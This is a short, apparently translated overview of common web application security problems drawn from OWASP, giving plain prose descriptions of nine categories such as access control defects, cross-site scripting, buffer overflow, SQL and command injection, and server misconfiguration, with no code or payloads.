Common security problems of web Applications

The Open Web Application Security Project (OWASP) lists the security problems that pose great harm to Web applications, including unverified parameters and access control defects, account and session management defects, cross-site scripting vulnerabilities, buffer overflow, Command Injection Vulnerabilities, error handling problems, remote management vulnerabilities, improper configuration of Web servers and application servers.
1) unverified Parameters
The information contained in the Web request is submitted to the Web application without verification. Attackers can maliciously construct a request containing a field, such as URL, request string, Cookie header, and form item, implicit parameter passing attacks against components running Web programs.
2) Access Control Defects
The user identity authentication policy is not executed, leading to illegal user operation information. Attackers can exploit this vulnerability to obtain other user accounts, browse sensitive files, delete modified content, perform unauthorized access, or even gain website administrator privileges.
3) account and session management Defects
Account and session tags are not effectively protected. Attackers can obtain passwords, session cookies, and other tokens, and break through user permission restrictions to gain trust from other users by using fake identities.
4) Cross-Site Scripting Vulnerability
Insert malicious code snippets into the HTML code of a remote Web page. The user thinks the page can be depended on. However, when the browser downloads the page, the script embedded in the file will be interpreted and executed.
5) Buffer Overflow
Web application components do not correctly verify the validity of input data, resulting in data overflow. Attackers can use this to execute a carefully crafted code to gain control over the program. Components that may be exploited include CGI, library files, driver files, and Web servers.
6) Command Injection Vulnerability
When a Web application interacts with an external system or a local operating system, parameters must be passed. If attackers embed malicious code in passing parameters, the external system may execute these commands. For example, an SQL injection attack means that an attacker inserts an SQL command into the input field of a Web form or the query string requested by the page, deceiving the server to execute malicious SQL commands.
7) handle errors
If normal operations are not effectively processed, an error message or insufficient memory, system call failure, network timeout, or server unavailability occurs. If attackers believe that the construction of Web applications cannot be handled, they may obtain system-related information from the feedback. For example, when a request packet tries to determine whether a file exists on the remote host, if the returned message is "file not found", the file is not found, if the returned message is "Access Denied", the object exists but has no access permission.
8) Remote Management Vulnerabilities
Many Web applications allow administrators to remotely manage websites through Web interfaces. If these management mechanisms do not properly authenticate visitors, attackers may have all site permissions through the interface.
9) Improper configuration of Web servers and application servers
For Web applications, robust servers are crucial. The configuration of the server is complex. For example, the configuration file of the Apache server is composed of commands and annotations. A command contains several parameters. Improper configuration has a great impact on security.